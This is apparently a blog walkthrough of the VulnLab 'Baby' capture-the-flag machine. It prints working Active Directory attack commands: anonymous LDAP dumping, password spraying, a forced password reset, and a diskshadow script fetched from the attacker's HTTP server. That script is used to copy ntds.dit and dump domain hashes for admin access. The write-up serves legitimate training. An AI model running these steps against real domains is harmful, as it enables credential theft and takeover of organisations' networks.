Penetration Testing - VulnLab - Baby (easy)
Enrique A.
CRTP | PNPT | ARTA | Security Engineer with 9 + years of experience in network penetration testing, AD testing, Linux Server Testing and web application security testing.
I've recently joined VulnLab and have been diving into their collection of machines to hone my penetration testing and ethical hacking skills. One of the first challenges I took on last night was Baby (I want to start testing the waters with the easy ones :P), which despite its name, proved to be a great way to learn and stay engaged. In this post, I'll walk you through the steps I followed to successfully exploit Baby.
1. Initial Reconnaissance with Nmap
Nmap scan report for 10.10.99.111
Host is up (0.047s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-23 14:30:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-05-22T14:19:38
|_Not valid after: 2024-11-21T14:19:38
|_ssl-date: 2024-05-23T14:31:14+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-23T14:30:35+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-23T14:30:35
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.59 seconds
From the Nmap results, we can see that we now have a piece of the puzzle, the domain name: baby.vl. After trying out some standard SMB enumeration commands - like smbclient -L to see what shares were available - I came up empty-handed. So, I decided to pivot and explore other options. My initial Nmap scan had already hinted that LDAP was active on port 389, which got me wondering about the potential for gathering intel from directory services.
2. LDAP Enumeration
By using LDAPSearch, I was able to dump user information from LDAP.
This is a command-line tool that queries an LDAP (Lightweight Directory Access Protocol) directory. It is used to search for and retrieve information stored in an LDAP directory.
Ran the command:
ldapsearch -x -H ldap://10.10.92.126:389 -b "DC=baby,DC=vl"
What is this command doing?
What the Command Does:
This command performs an LDAP search on the server at IP address 10.10.99.111 on port 389, starting from the base DN DC=baby,DC=vl0. It uses simple authentication (-x) and connects using the LDAP protocol. The command retrieves all entries within the specified base DN that match the search criteria (in this case, since no specific search filter is provided, it retrieves all entries).
The results
Checking the results it was possible to extract many users by searching for "samaccountname", also from "memberof" . One more interesting thing is that a password was showing up also in one of the descriptions:
Attempted to log into the machine with teresa.bell as the username but it was not working.
3. Password Spraying
We have more parts of the puzzle now:
So we can now start password spraying the password with the list of users we now have with the following tool:
CrackMapExec (https://github.com/byt3bl33d3r/CrackMapExec)
From the results, it shows that the user Caroline.Robinson is currently using the password BabyStart123! ... but it needs to be changed. So we will be using another tool called smbpasswd in order to change the user's password.
└─$ smbpasswd -U Caroline.Robinson -r 10.10.99.111
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
```
Changed it to Password123!!!
Now we can Log into the server with Caroline.Robinson user.
4. Privilege Escalation
Once logged into the server with the tool Evil-Winrm, I checked for privileges:
Noted that the SeBackupPrivilege is enabled.
Found some good articles explaining how to abuse this privilege:
In this walkthrough I will be using the technique shown in the first article.
Basically it explains that to exploit the SeBackupPrivilege on a Domain Controller, you can use the diskshadow utility to create a Volume Shadow Copy of the C: drive. Create a DSH file with necessary commands, then upload and run it on the target. This allows copying of the ntds.dit file and the system hive using robocopy. Download these files to your local machine and use the secretsdump.py script from the Impacket suite to extract password hashes, allowing us to log into the machine with admin credentials.
领英推荐
As per the first article, we need to create a file with the following content:
set context persistent nowriters
add volume c: alias punk
create
expose %punk% z:
I saved this file as evil.dsh on my linux box and ran the following command as it is recommended in the article:
unix2dos evil.dsh
Also, on my linux box I started an HTTP server in order to share this file:
python -m http.server 9090
From the victim machine I ran the following command:
wget https://10.8.x.x:9090/evil.dsh -Outfile evil.dsh
Once the file was saved on the victim server... we can proceed with the attack:
1) Creating the shadow copy:
diskshadow /s evil.dsh
2) Once the shadow copy is ready, we can proceed to extract the ntds.dit file with robocopy.
robocopy /b Z:\windows\ntds C:\temp ntds.dit
3) We also need to get the System Hive.
4) With the ntds.dit and system hive we can now use impacket-secretsdump to dump all hashes on that box.
Now we can log into the server as the administrator user with evil-winrm and the newly obtained hash.
Another method
Another method to extract the ntds.dit file would be to create a shadow copy with vssadmin and then manually extract the ntds.dit file.
Once the shadow copy is created, we proceed to list the shadow copies and then manually extract the ntds.dit file.
The rest should be to extract the files from the server and run impacket-secretsdump against those files.
Conclusion
Joining VulnLab has been an excellent decision for advancing my penetration testing and ethical hacking skills. Tackling the "Baby" machine was a perfect start, offering valuable insights and reinforcing essential techniques. From initial reconnaissance with Nmap to exploiting LDAP and leveraging SeBackupPrivilege for privilege escalation, each step was a learning experience. The journey underscored the importance of persistence, adaptability, and thorough exploration of potential attack vectors. I look forward to diving into more challenges and sharing my experiences. Happy hacking!
Information Security Professional | Safeguarding Assets, Mitigating Risks
9 个月Thanks for sharing! Periodically reading penetration test walkthroughs like this are a relatively quick way to understand real level of effort and resources attackers use to achieve specific objectives. Defenders who stay informed at this level of detail can better prioritize their resources to reduce security risks.